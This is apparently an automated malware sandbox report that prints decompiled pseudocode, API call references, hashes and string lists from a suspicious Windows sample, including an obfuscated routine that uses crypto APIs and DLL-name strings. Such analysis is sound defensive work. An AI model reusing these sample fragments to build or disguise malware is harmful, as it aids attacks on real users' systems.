                                                				 *[fs:eax] = _t52 + 0xfffffde8;
                                                				GetModuleFileNameW(0,  &_v530, 0x105);
                                                				E00407388( &_v536, _t49);
                                                				_push(_v536);
                                                				E004073C4( &_v540, 0x105,  &_v530);
                                                				_pop(_t44); // executed
                                                				E0040976C(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
                                                				if(_v8 != 0) {
                                                					LoadLibraryExW(E00407330(_v8), 0, 2);
                                                				}
                                                				_pop(_t45);
                                                				 *[fs:eax] = _t45;
                                                				_push(E00409951);
                                                				E00406A08( &_v540, 2);
                                                				return E004069A8( &_v8);
                                                 			}

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040994A,?,?,00000000), ref: 004098CC
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040994A,?,?,00000000), ref: 0040991D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileLibraryLoadModuleName
                                                • String ID:
                                                • API String ID: 1159719554-0
                                                • Opcode ID: fee7203526c99c492627a90671c6ea93e27203af42f0eb7a7628b6b2e4e0d64d
                                                • Instruction ID: abcb281defec52438f0aee72fd6b8df3303e77283fcf52908e18b12cff9e9f28
                                                • Opcode Fuzzy Hash: fee7203526c99c492627a90671c6ea93e27203af42f0eb7a7628b6b2e4e0d64d
                                                • Instruction Fuzzy Hash: 8F119170A4421CABDB15EB60CD86BDE73B8EB04304F5144BFB908B32D1DA785F84CA99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,00770223,?,?), ref: 00770E02
                                                • SetErrorMode.KERNELBASE(00000000,?,?,00770223,?,?), ref: 00770E07
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: 2d4e3394b66ef8ae9ce10699264cf18145feedeed87f970c8040e06d6a4eda9a
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 7ED0123224522CB7DB002B94DC09BCEBB1C9F05BA6F008461FB0DE9181CBB49A4047EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL ref: 004094CF
                                                  • Part of subcall function 0040918C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004093B1,?,?), ref: 004091C5
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1,?,?), ref: 0040920E
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1,?,?), ref: 00409230
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040924E
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040926C
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040928A
                                                  • Part of subcall function 0040918C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 004092A8
                                                  • Part of subcall function 0040918C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1), ref: 004092E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Open$AllocateFileHeapModuleNameQueryValue
                                                • String ID:
                                                • API String ID: 1498552066-0
                                                • Opcode ID: 5ac7ca9ec81bc7bfe72ff0239882a76ae01f185a44a38f61c9deb5fcbadb4562
                                                • Instruction ID: 8d95190941045e390cd65a6c7fba753f498773491901b0d068e0e883a774856c
                                                • Opcode Fuzzy Hash: 5ac7ca9ec81bc7bfe72ff0239882a76ae01f185a44a38f61c9deb5fcbadb4562
                                                • Instruction Fuzzy Hash: 0FF02730704604BFD701DF56CC42B1973E9D789700FA20476F800A3692D67CAD10D59C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040861C(void* __eax) {
                                                				short _v532;
                                                				void* __ebx;
                                                				void* __esi;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				void* _t18;
                                                				void* _t19;
                                                				intOrPtr _t20;
                                                				void* _t21;
                                                
                                                				_t16 = __eax;
                                                				_t22 =  *((intOrPtr*)(__eax + 0x10));
                                                				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
                                                					_t14 = E00409890(_t21, _t16, _t18, _t19, _t22); // executed
                                                					_t20 = _t14;
                                                					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
                                                					if(_t20 == 0) {
                                                						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                					}
                                                				}
                                                				return  *((intOrPtr*)(_t16 + 0x10));
                                                			}












                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040863A
                                                  • Part of subcall function 00409890: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040994A,?,?,00000000), ref: 004098CC
                                                  • Part of subcall function 00409890: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040994A,?,?,00000000), ref: 0040991D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileModuleName$LibraryLoad
                                                • String ID:
                                                • API String ID: 4113206344-0
                                                • Opcode ID: f05193af6b9ae2eb17e4c641f12adcc748934bd50d5f8c8f5afbbe42bfbbf2f0
                                                • Instruction ID: 0e81d8804b11a62c962dc62eaeeb1fe2862d9b45ef9dac6b836595d74b3b49b3
                                                • Opcode Fuzzy Hash: f05193af6b9ae2eb17e4c641f12adcc748934bd50d5f8c8f5afbbe42bfbbf2f0
                                                • Instruction Fuzzy Hash: C9E06D71A003109BCB10EF58C9C5A4333D4AB08714F04496AAD68DF387D376CD1087D5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00770929
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ProcessTerminate
                                                • String ID:
                                                • API String ID: 560597551-0
                                                • Opcode ID: 89cc55c70507a058e9ffb3aae4f4296a9997ee6c0a4edae31c5b1a86bfd637e3
                                                • Instruction ID: 30f3d7182eefe4c983e93399632d1765ae8032794c4adb82b9e2ac84a56656d9
                                                • Opcode Fuzzy Hash: 89cc55c70507a058e9ffb3aae4f4296a9997ee6c0a4edae31c5b1a86bfd637e3
                                                • Instruction Fuzzy Hash: EE90026074415011D82025AC0C02B0500121751634F344B107130AD1E4D840D6400115
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402C90(signed int __eax) {
                                                				void* _t4;
                                                				intOrPtr _t7;
                                                				signed int _t8;
                                                				void** _t10;
                                                				void* _t12;
                                                				void* _t14;
                                                
                                                				_t8 = __eax;
                                                				E00402C24(__eax);
                                                				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
                                                				if(_t4 == 0) {
                                                					 *0x500aec = 0;
                                                					return 0;
                                                				} else {
                                                					_t10 =  *0x500ad8; // 0x500ad4
                                                					_t14 = _t4;
                                                					 *_t14 = 0x500ad4;
                                                					 *0x500ad8 = _t4;
                                                					 *(_t14 + 4) = _t10;
                                                					 *_t10 = _t4;
                                                					_t12 = _t14 + 0x13fff0;
                                                					 *((intOrPtr*)(_t12 - 4)) = 2;
                                                					 *0x500aec = 0x13ffe0 - _t8;
                                                					_t7 = _t12 - _t8;
                                                					 *0x500ae8 = _t7;
                                                					 *(_t7 - 4) = _t8 | 0x00000002;
                                                					return _t7;
                                                				}
                                                			}









                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,004032A7,?,0040384C), ref: 00402CA7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 326c3bdebeb7e627de19b7ce6dc7f538a477a2572a34d424dc00b6526fa549a6
                                                • Instruction ID: efd5973e88ca5547850cd3ab6255c5b1b359cf299ad81ce79c05260f9c7ae9f1
                                                • Opcode Fuzzy Hash: 326c3bdebeb7e627de19b7ce6dc7f538a477a2572a34d424dc00b6526fa549a6
                                                • Instruction Fuzzy Hash: D8F0AFF2B043404FE754DF789E4434ABAE4E708314F10413EE909EB7D4DAB488059B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00402DBA(void* __eax) {
                                                				struct _MEMORY_BASIC_INFORMATION _v44;
                                                				void* _v48;
                                                				void* _t13;
                                                				int _t20;
                                                				void* _t22;
                                                				signed int _t26;
                                                				signed int _t29;
                                                				signed int _t30;
                                                				void* _t34;
                                                				intOrPtr _t35;
                                                				signed int _t39;
                                                				void* _t41;
                                                				void* _t42;
                                                
                                                				_push(_t29);
                                                				_t42 = _t41 + 0xffffffdc;
                                                				_t34 = __eax - 0x10;
                                                				E00402D0C();
                                                				_t13 = _t34;
                                                				 *_t42 =  *_t13;
                                                				_v48 =  *((intOrPtr*)(_t13 + 4));
                                                				_t26 =  *(_t13 + 0xc);
                                                				if((_t26 & 0x00000008) != 0) {
                                                					_t22 = _t34;
                                                					_t39 = _t26 & 0xfffffff0;
                                                					_t30 = 0;
                                                					while(1) {
                                                						VirtualQuery(_t22,  &_v44, 0x1c);
                                                						if(VirtualFree(_t22, 0, 0x8000) == 0) {
                                                							break;
                                                						}
                                                						_t35 = _v44.RegionSize;
                                                						if(_t39 > _t35) {
                                                							_t39 = _t39 - _t35;
                                                							_t22 = _t22 + _t35;
                                                							continue;
                                                						}
                                                						goto L10;
                                                					}
                                                					_t30 = _t30 | 0xffffffff;
                                                				} else {
                                                					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
                                                					if(_t20 == 0) {
                                                						_t30 = _t29 | 0xffffffff;
                                                					} else {
                                                						_t30 = 0;
                                                					}
                                                				}
                                                				L10:
                                                				if(_t30 == 0) {
                                                					 *_v48 =  *_t42;
                                                					 *( *_t42 + 4) = _v48;
                                                				}
                                                				 *0x502b74 = 0;
                                                				return _t30;
                                                			}
















                                                APIs
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402DEB
                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402E0E
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402E1B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Virtual$Free$Query
                                                • String ID:
                                                • API String ID: 778034434-0
                                                • Opcode ID: aab089f6324b908b00522f95e514dda92ea28812edbdd12cb1dfe4c55132e884
                                                • Instruction ID: 08f1e0c87a1cd087832e8d35915ef13b2870af4c3a8107d53628f023ff2ab1f1
                                                • Opcode Fuzzy Hash: aab089f6324b908b00522f95e514dda92ea28812edbdd12cb1dfe4c55132e884
                                                • Instruction Fuzzy Hash: 18F06D703046005FD310CB1ACA88B17B7E5EFC4750F15C26AE888973E0D675DC01979A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00000000,004F30C8,?,?,00000000,004F31F8), ref: 00861413
                                                • CryptImportKey.ADVAPI32(?,?,00000254,00000000,00000000,?,?), ref: 00861537
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,004F2EFA,?,004FEEF0), ref: 0086161E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Crypt$AcquireContext$Import
                                                • String ID: ,O$/$8O$CNB_0309.DLL$CNB_0317.DLL$DO$GetKeyboardState$Microsoft.WSMan.Management.ni.dll$NetEnumerateServiceAccounts$System.Runtime.Remoting.dll$WcnEapPeerProxy.dll$WininetPlugin.dll$api-ms-win-core-datetime-l1-1-0.dll$api-ms-win-core-util-l1-1-0.dll$davclnt.dll$dmintf.dll$dxmasf.dll$mqcertui.dll$repdrvfs.dll$rtm.dll$O$O
                                                • API String ID: 3710563934-1982265789
                                                • Opcode ID: 8b067af7de0b62cbe19893d3b42479b5e4d4d03e27a7ca6e6956962743a6d056
                                                • Instruction ID: 7249071db8ffc44119c3af7a3b345f2344f752005b5b6fa959f9acc27f73e28e
                                                • Opcode Fuzzy Hash: 8b067af7de0b62cbe19893d3b42479b5e4d4d03e27a7ca6e6956962743a6d056
                                                • Instruction Fuzzy Hash: 3823F270E00259DFCB10CFAAE985AADBBF1FB08306F15847AE405E7265D734A951CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,004F65DC,?,00000000,004F6673), ref: 00865F58
                                                • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000000,004F6587,?,?,00000000,004F6673), ref: 0086600F
                                                • CryptHashData.ADVAPI32(?,?,00000000,00000000,00000000,004F632A,?,?,?,?,00000000,004F6673), ref: 008660E0
                                                • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,004FEEA0,004FEF10,?,?,?,?,00000000,004F6673), ref: 0086618C
                                                • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00866298
                                                • CryptDestroyHash.ADVAPI32(?,004F6334,?,?,00000000,004F6673), ref: 008664C9
                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,004F6591,?,?,00000000,004F6673), ref: 008667D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                • String ID: ,O$,O$5$8O$GetUserDefaultLocaleName$Microsoft.WSMan.Management.dll$S$`\O$iaspolcy.dll
                                                • API String ID: 3606780921-3631910282
                                                • Opcode ID: 17b053318821211c53b50479e03f64d35be63d2f6872d3e56b2018bc56de05ea
                                                • Instruction ID: 3be6e4c4a6067e6cacaac2760bffa16900d8ed1625eeec2008f7d63050559ab4
                                                • Opcode Fuzzy Hash: 17b053318821211c53b50479e03f64d35be63d2f6872d3e56b2018bc56de05ea
                                                • Instruction Fuzzy Hash: B242C6B1A10249EFDB00CF6AED85AA977F5FB08302B15453AE504E7375D775A820CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00408F9C(short* __eax, intOrPtr __edx) {
                                                				short* _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				void* _v20;
                                                				struct _WIN32_FIND_DATAW _v612;
                                                				short _v1134;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				void* _t55;
                                                				signed int _t88;
                                                				signed int _t89;
                                                				intOrPtr* _t90;
                                                				signed int _t101;
                                                				signed int _t102;
                                                				short* _t112;
                                                				struct HINSTANCE__* _t113;
                                                				short* _t115;
                                                				short* _t116;
                                                				void* _t117;
                                                
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				_v16 = _v8;
                                                				_t113 = GetModuleHandleW(L"kernel32.dll");
                                                				if(_t113 == 0) {
                                                					L4:
                                                					if( *_v8 != 0x5c) {
                                                						_t115 = _v8 + 4;
                                                						goto L10;
                                                					} else {
                                                						if( *((short*)(_v8 + 2)) == 0x5c) {
                                                							_t116 = E00408F78(_v8 + 4);
                                                							if( *_t116 != 0) {
                                                								_t14 = _t116 + 2; // 0x2
                                                								_t115 = E00408F78(_t14);
                                                								if( *_t115 != 0) {
                                                									L10:
                                                									_t88 = _t115 - _v8;
                                                									_t89 = _t88 >> 1;
                                                									if(_t88 < 0) {
                                                										asm("adc ebx, 0x0");
                                                									}
                                                									_t43 = _t89 + 1;
                                                									if(_t89 + 1 <= 0x105) {
                                                										E004089C0( &_v1134, _v8, _t43);
                                                										while( *_t115 != 0) {
                                                											_t112 = E00408F78(_t115 + 2);
                                                											_t50 = _t112 - _t115;
                                                											_t51 = _t50 >> 1;
                                                											if(_t50 < 0) {
                                                												asm("adc eax, 0x0");
                                                											}
                                                											if(_t51 + _t89 + 1 <= 0x105) {
                                                												_t55 =  &_v1134 + _t89 + _t89;
                                                												_t101 = _t112 - _t115;
                                                												_t102 = _t101 >> 1;
                                                												if(_t101 < 0) {
                                                													asm("adc edx, 0x0");
                                                												}
                                                												E004089C0(_t55, _t115, _t102 + 1);
                                                												_v20 = FindFirstFileW( &_v1134,  &_v612);
                                                												if(_v20 != 0xffffffff) {
                                                													FindClose(_v20);
                                                													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
                                                														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
                                                														E004089C0( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
                                                														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
                                                														_t115 = _t112;
                                                														continue;
                                                													}
                                                												}
                                                											}
                                                											goto L24;
                                                										}
                                                										E004089C0(_v8,  &_v1134, _v12);
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
                                                					if(_t90 == 0) {
                                                						goto L4;
                                                					} else {
                                                						_push(0x105);
                                                						_push( &_v1134);
                                                						_push(_v8);
                                                						if( *_t90() == 0) {
                                                							goto L4;
                                                						} else {
                                                							E004089C0(_v8,  &_v1134, _v12);
                                                						}
                                                					}
                                                				}
                                                				L24:
                                                				return _v16;
                                                			}























                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408FB9
                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 00408FCA
                                                • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 004090CA
                                                • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 004090DC
                                                • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 004090E8
                                                • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 0040912D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                • String ID: GetLongPathNameW$\$kernel32.dll
                                                • API String ID: 1930782624-3908791685
                                                • Opcode ID: 7bfd6da0a51bea9cbff87e86f6837e20dd1a2e1208d5721c0ebb964e9cceb7fe
                                                • Instruction ID: b457252b37f825ca2f5f8d963c3cacb7670c93aa888cd6ef951b963f75adfa86
                                                • Opcode Fuzzy Hash: 7bfd6da0a51bea9cbff87e86f6837e20dd1a2e1208d5721c0ebb964e9cceb7fe
                                                • Instruction Fuzzy Hash: FB41C271E00619DBDB10EAA4CC89ADEB3B6AF44310F1485BAD544F73C2EB7C9E418B49
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(0040915C,?,?,?), ref: 00779209
                                                • GetProcAddress.KERNEL32(00000000,00409178), ref: 0077921A
                                                • FindFirstFileW.KERNEL32(?,?,0040915C,?,?,?), ref: 0077931A
                                                • FindClose.KERNEL32(?,?,?,0040915C,?,?,?), ref: 0077932C
                                                • lstrlenW.KERNEL32(?,?,?,?,0040915C,?,?,?), ref: 00779338
                                                • lstrlenW.KERNEL32(?,?,?,?,?,0040915C,?,?,?), ref: 0077937D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                • String ID: \
                                                • API String ID: 1930782624-2967466578
                                                • Opcode ID: c376dbb1f1865d31d1b3797754f80c05f43d3c077cb8f76016cbcc13f6ede75f
                                                • Instruction ID: c0c2a52712e1315d3238d70fc38b41c91db35ab278a4169dd16a04c40648d607
                                                • Opcode Fuzzy Hash: c376dbb1f1865d31d1b3797754f80c05f43d3c077cb8f76016cbcc13f6ede75f
                                                • Instruction Fuzzy Hash: F941B131E01619DBDF10EBA4CC89ADDB3B5EF44350F14C5A4E648E7282EB78EE418B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E004F6334(void* __ebx, void* __eflags) {
                                                				signed int _t30;
                                                				signed int _t35;
                                                				signed int _t38;
                                                				signed int _t39;
                                                				signed int _t42;
                                                				intOrPtr _t43;
                                                				intOrPtr _t45;
                                                				intOrPtr _t47;
                                                				signed int _t48;
                                                				signed int _t49;
                                                				signed int _t51;
                                                				signed int _t52;
                                                				intOrPtr _t53;
                                                				intOrPtr _t54;
                                                				signed int _t70;
                                                				intOrPtr _t72;
                                                				intOrPtr _t74;
                                                				signed int _t79;
                                                				signed int _t80;
                                                				signed int _t84;
                                                				signed int _t92;
                                                				signed int _t94;
                                                				intOrPtr _t96;
                                                				signed int _t98;
                                                				void* _t99;
                                                				signed int _t101;
                                                				intOrPtr _t109;
                                                				intOrPtr _t111;
                                                				signed int _t116;
                                                				void* _t118;
                                                				void* _t121;
                                                				void* _t126;
                                                
                                                				_t99 = __ebx;
                                                				_t30 =  *0x4feef4; // 0xb52124ca
                                                				E004FEF0C = _t30 + 0x6a;
                                                				E00407678( *((intOrPtr*)(_t118 - 0x1c)), 4, 1, _t118 - 0x14);
                                                				_t35 =  *0x4feef0 * 0xce;
                                                				 *0x4fef28 = _t35;
                                                				E00407640( *((intOrPtr*)(_t118 - 0x18)),  *((intOrPtr*)(_t118 - 0x1c)));
                                                				if(_t35 != 0) {
                                                					_t38 =  *0x4fef14 * 0xf8;
                                                					__eflags = _t38;
                                                					E004FEF10 = _t38;
                                                				} else {
                                                					_t94 =  *0x4fef3c; // 0x1cb932a9
                                                					_t116 =  *0x4feea0; // 0xa1d900
                                                					_t121 = _t94 +  *0x4fef04 - _t116 +  *0x4fef3c;
                                                					if(_t121 >= 0) {
                                                						_t96 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4feee0 = _t96 + 0xfb;
                                                					} else {
                                                						_t98 =  *0x4feeec; // 0xb52124f2
                                                						 *0x4feea0 = _t98;
                                                					}
                                                				}
                                                				_t39 =  *0x4fef40; // 0x3c79b5d4
                                                				 *0x4fef28 = _t39;
                                                				E00406CF4(_t118 - 0x18,  *((intOrPtr*)(_t118 - 0x18)));
                                                				_t42 =  *0x4fef28; // 0x3c79b5d4
                                                				 *0x4feecc = _t42;
                                                				_t43 =  *0x4feea8; // 0x0
                                                				_t109 =  *0x4feec4; // 0x0
                                                				E00407640(_t43, _t109);
                                                				if(_t121 == 0) {
                                                					E004F0EBC(_t118 - 0x20,  &E004FEF38, _t121);
                                                					 *0x4feeec =  *0x4fef04 * 0x8a;
                                                					_t92 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4feef4 = _t92;
                                                					asm("fild dword [0x4fef18]");
                                                					 *0x4fef04 = E004048CC();
                                                				}
                                                				_t45 =  *0x4fef18; // 0xbc3e19a
                                                				E004FEF20 = _t45 +  *0x4fef40;
                                                				_t47 =  *0x4feeb8; // 0x0
                                                				 *((intOrPtr*)(_t118 - 0x3c)) = _t47;
                                                				if( *((intOrPtr*)(_t118 - 0x3c)) != 0) {
                                                					 *((intOrPtr*)(_t118 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x3c)) - 4));
                                                				}
                                                				if( *((intOrPtr*)(_t118 - 0x3c)) != 0x53) {
                                                					_t48 = E004FEF0C; // 0xb52124bf
                                                					_t49 = _t48 + 4;
                                                					__eflags = _t49;
                                                					 *(_t118 - 0x44) = _t49;
                                                					asm("fild dword [ebp-0x44]");
                                                					 *0x4feefc = E004048D8();
                                                				} else {
                                                					_t79 =  *0x4fef30; // 0xa1d816
                                                					E004FEF38 = _t79;
                                                					_t80 = E004FEF38; // 0xc3c34fdc
                                                					_t126 = _t80 -  *0x4feef4; // 0xb52124ca
                                                					if(_t126 >= 0) {
                                                						E00407678( *((intOrPtr*)(_t118 - 0xc)), 0, 1, _t118 - 0xc);
                                                					} else {
                                                						_t84 = E004FEF2C; // 0xa1d900
                                                						 *0x4fef4c = _t84 + 4;
                                                					}
                                                				}
                                                				_t51 = E004FEF38; // 0xc3c34fdc
                                                				E004FEF10 = _t51;
                                                				_t52 = E004FEF10; // 0x1cb931c0
                                                				_push(_t52);
                                                				_t53 =  *0x4fef18; // 0xbc3e19a
                                                				_push(_t53);
                                                				_t54 =  *0x4fef48; // 0xc3c34ef0
                                                				_t101 =  *0x4feeec; // 0xb52124f2
                                                				 *0x4fef4c = E004F5954( *((intOrPtr*)(_t118 - 0x20)), _t99, _t101,  *((intOrPtr*)(_t118 - 0x20)), _t126);
                                                				_t111 = _t54;
                                                				 *[fs:eax] = _t111;
                                                				_push(E004F6591);
                                                				 *((intOrPtr*)(_t118 - 0x40)) =  *((intOrPtr*)(_t118 - 0x10));
                                                				if( *((intOrPtr*)(_t118 - 0x40)) != 0) {
                                                					 *((intOrPtr*)(_t118 - 0x40)) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x40)) - 4));
                                                				}
                                                				if( *((intOrPtr*)(_t118 - 0x40)) == 0x35) {
                                                					_t70 =  *0x4feea0; // 0xa1d900
                                                					 *0x4feea0 = E0040489C(_t70);
                                                					_t72 =  *0x4feee8; // 0xdcd0f434
                                                					 *0x4feedc = _t72 + 0x77;
                                                					_t74 =  *0x4feefc; // 0x4b08dcc7
                                                					 *0x4feef0 = _t74 + 4;
                                                				}
                                                				E004FEF10 =  *0x4feef4 * 0xd9;
                                                				 *0x4fef28 = 0x72 - E004FEF2C;
                                                				 *0x4fef04 = E004F356C(_t118 - 0x20, _t99, _t118 - 0x20, 0x4feef4, _t118 - 0x20);
                                                				 *0x4fef3c =  *0x4fef28 * 0xd6;
                                                				E00406CF4(_t118 - 0x1c,  *((intOrPtr*)(_t118 - 0x10)));
                                                				return CryptReleaseContext( *(_t118 - 0x24), 0);
                                                			}




































                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID: 5$secur32.dll
                                                • API String ID: 0-2143472804
                                                • Opcode ID: 472484bea1d54e38275b9842fc81fac6e2b50d3f68021d3f75d40a37947cea4c
                                                • Instruction ID: 1fa50ebd78c81655f27541a69fb3294134e2ebe0b4fccc2a26a0502d3b5d8bb0
